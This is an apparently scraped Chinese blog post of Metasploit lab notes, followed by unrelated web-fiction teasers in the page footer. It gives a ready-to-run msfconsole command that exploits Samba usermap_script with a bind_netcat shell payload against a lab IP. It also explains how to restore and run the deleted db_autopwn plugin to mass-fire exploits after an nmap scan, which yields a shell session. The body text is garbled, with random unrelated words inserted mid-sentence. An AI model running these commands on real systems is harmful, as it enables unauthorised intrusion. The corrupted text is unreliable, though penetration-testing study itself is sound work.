metasploit學習筆記2

1.閱讀老資料的困惑

老資料里一般是根據(jù)BT5整理的,kali里的metasploit比較新,不太一樣淋样,這里整理一下。

a)msfcli被整合進msfconsole的參數(shù)里:

老指令:

#msfcli multi/samba/usermap_script PAYLOAD=cmd/unix/bind_netcat RHOST=192.168.200.129 E

新指令:

#msfconsole?-x?"use?exploit/multi/samba/usermap_script;?set?RHOST 192.168.200.129;?set?PAYLOADcmd/unix/bind_netcat; [set?LHOST IP;] run"

b)msfpayload胁住、msfencode被整合到msfvenom里:

老指令:

msfpayload -l ? ? ? ?#查看所有攻擊載荷

msfencode -l ? ? ? ? #查看所有編碼器

新指令只需一條指令即可:

msfvenom -l payloads,encoders

下圖是msfvenom的參數(shù)說明:

c)db_autopwn自動滲透腳本被刪除

據(jù)說是由于該腳本雖然使?jié)B透傻瓜化趁猴,但是智能不高,并且造成的負載不小彪见,容易被發(fā)現(xiàn)儡司,所以刪掉了。

目前替代的方法是可以使用metasploit的一些自動化插件和腳本余指,但是更好的方法還是自己選擇合適的腳本和載荷捕犬,使負載變小,效率更高酵镜。

https://github.com/rapid7/metasploit-framework/tree/master/plugins

2.db_autopwn傻瓜化測試

雖然db_autopwn被刪掉了碉碉,但是可以手工恢復(fù)。

https://github.com/PsychoSpy/metasploit-framework/blob/autopwn-modules/plugins/db_autopwn.rb

源代碼復(fù)制下來淮韭,保存為db_autopwn.rb文件垢粮,復(fù)制到/usr/share/metasploit-framwork/plugins/中,然后執(zhí)行加載

#msf>load db_autopwn

滲透測試:

a)掃描測試機

#msf>db_nmap -v -A 192.168.200.129

--測試機的掃描結(jié)果會自動存放如Postgresql數(shù)據(jù)庫中

b)查看掃描結(jié)果

c)自動測試

#msf>db_autopwn -t -p -r -e?? ? ? ?? ----負載不小靠粪,1000多個腳本都會跑一遍蜡吧,需要不少時間毫蚓,好在成功了一個session。

d)連接會話并測試

會話連接已經(jīng)成功斩跌,但user是www-data(敲錯的指令绍些,請自動忽略),不是root耀鸦,沒關(guān)系柬批,至少證明db_autopwn還是管用的。

最后編輯于
?著作權(quán)歸作者所有,轉(zhuǎn)載或內(nèi)容合作請聯(lián)系作者
  • 序言:七十年代末袖订,一起剝皮案震驚了整個濱河市氮帐,隨后出現(xiàn)的幾起案子,更是在濱河造成了極大的恐慌洛姑,老刑警劉巖上沐,帶你破解...
    沈念sama閱讀 216,651評論 6 501
  • 序言:濱河連續(xù)發(fā)生了三起死亡事件,死亡現(xiàn)場離奇詭異楞艾,居然都是意外死亡参咙,警方通過查閱死者的電腦和手機,發(fā)現(xiàn)死者居然都...
    沈念sama閱讀 92,468評論 3 392
  • 文/潘曉璐 我一進店門硫眯,熙熙樓的掌柜王于貴愁眉苦臉地迎上來蕴侧,“玉大人,你說我怎么就攤上這事两入【幌” “怎么了?”我有些...
    開封第一講書人閱讀 162,931評論 0 353
  • 文/不壞的土叔 我叫張陵裹纳,是天一觀的道長择葡。 經(jīng)常有香客問我,道長剃氧,這世上最難降的妖魔是什么敏储? 我笑而不...
    開封第一講書人閱讀 58,218評論 1 292
  • 正文 為了忘掉前任,我火速辦了婚禮她我,結(jié)果婚禮上虹曙,老公的妹妹穿的比我還像新娘。我一直安慰自己番舆,他們只是感情好,可當我...
    茶點故事閱讀 67,234評論 6 388
  • 文/花漫 我一把揭開白布矾踱。 她就那樣靜靜地躺著恨狈,像睡著了一般。 火紅的嫁衣襯著肌膚如雪呛讲。 梳的紋絲不亂的頭發(fā)上禾怠,一...
    開封第一講書人閱讀 51,198評論 1 299
  • 那天返奉,我揣著相機與錄音,去河邊找鬼吗氏。 笑死芽偏,一個胖子當著我的面吹牛,可吹牛的內(nèi)容都是我干的弦讽。 我是一名探鬼主播污尉,決...
    沈念sama閱讀 40,084評論 3 418
  • 文/蒼蘭香墨 我猛地睜開眼,長吁一口氣:“原來是場噩夢啊……” “哼往产!你這毒婦竟也來了被碗?” 一聲冷哼從身側(cè)響起,我...
    開封第一講書人閱讀 38,926評論 0 274
  • 序言:老撾萬榮一對情侶失蹤仿村,失蹤者是張志新(化名)和其女友劉穎锐朴,沒想到半個月后,有當?shù)厝嗽跇淞掷锇l(fā)現(xiàn)了一具尸體蔼囊,經(jīng)...
    沈念sama閱讀 45,341評論 1 311
  • 正文 獨居荒郊野嶺守林人離奇死亡焚志,尸身上長有42處帶血的膿包…… 初始之章·張勛 以下內(nèi)容為張勛視角 年9月15日...
    茶點故事閱讀 37,563評論 2 333
  • 正文 我和宋清朗相戀三年,在試婚紗的時候發(fā)現(xiàn)自己被綠了畏鼓。 大學時的朋友給我發(fā)了我未婚夫和他白月光在一起吃飯的照片酱酬。...
    茶點故事閱讀 39,731評論 1 348
  • 序言:一個原本活蹦亂跳的男人離奇死亡,死狀恐怖滴肿,靈堂內(nèi)的尸體忽然破棺而出岳悟,到底是詐尸還是另有隱情,我是刑警寧澤泼差,帶...
    沈念sama閱讀 35,430評論 5 343
  • 正文 年R本政府宣布贵少,位于F島的核電站,受9級特大地震影響堆缘,放射性物質(zhì)發(fā)生泄漏滔灶。R本人自食惡果不足惜,卻給世界環(huán)境...
    茶點故事閱讀 41,036評論 3 326
  • 文/蒙蒙 一吼肥、第九天 我趴在偏房一處隱蔽的房頂上張望录平。 院中可真熱鬧,春花似錦缀皱、人聲如沸斗这。這莊子的主人今日做“春日...
    開封第一講書人閱讀 31,676評論 0 22
  • 文/蒼蘭香墨 我抬頭看了看天上的太陽表箭。三九已至,卻和暖如春钮莲,著一層夾襖步出監(jiān)牢的瞬間免钻,已是汗流浹背彼水。 一陣腳步聲響...
    開封第一講書人閱讀 32,829評論 1 269
  • 我被黑心中介騙來泰國打工, 沒想到剛下飛機就差點兒被人妖公主榨干…… 1. 我叫王不留极舔,地道東北人凤覆。 一個月前我還...
    沈念sama閱讀 47,743評論 2 368
  • 正文 我出身青樓,卻偏偏與公主長得像拆魏,于是被迫代替她去往敵國和親盯桦。 傳聞我的和親對象是個殘疾皇子,可洞房花燭夜當晚...
    茶點故事閱讀 44,629評論 2 354

推薦閱讀更多精彩內(nèi)容

  • http://192.168.136.131/sqlmap/mysql/get_int.php?id=1 當給sq...
    xuningbo閱讀 10,301評論 2 22
  • Spring Cloud為開發(fā)人員提供了快速構(gòu)建分布式系統(tǒng)中一些常見模式的工具(例如配置管理稽揭,服務(wù)發(fā)現(xiàn)俺附,斷路器,智...
    卡卡羅2017閱讀 134,652評論 18 139
  • sqlmap用戶手冊 說明:本文為轉(zhuǎn)載溪掀,對原文中一些明顯的拼寫錯誤進行修正事镣,并標注對自己有用的信息。 ======...
    wind_飄閱讀 2,044評論 0 5
  • 作者:Gilberto Najera-Gutierrez譯者:飛龍協(xié)議:CC BY-NC-SA 4.0 簡介 這章...
    三月行者閱讀 1,891評論 2 7
  • 一 漏洞及漏洞發(fā)掘方法 漏洞揪胃,是指在硬件璃哟、軟件、協(xié)議實現(xiàn)或系統(tǒng)安全策略上存在缺陷喊递,攻擊者能夠在未授權(quán)的情況下對系統(tǒng)...
    kaitoulee閱讀 15,211評論 0 30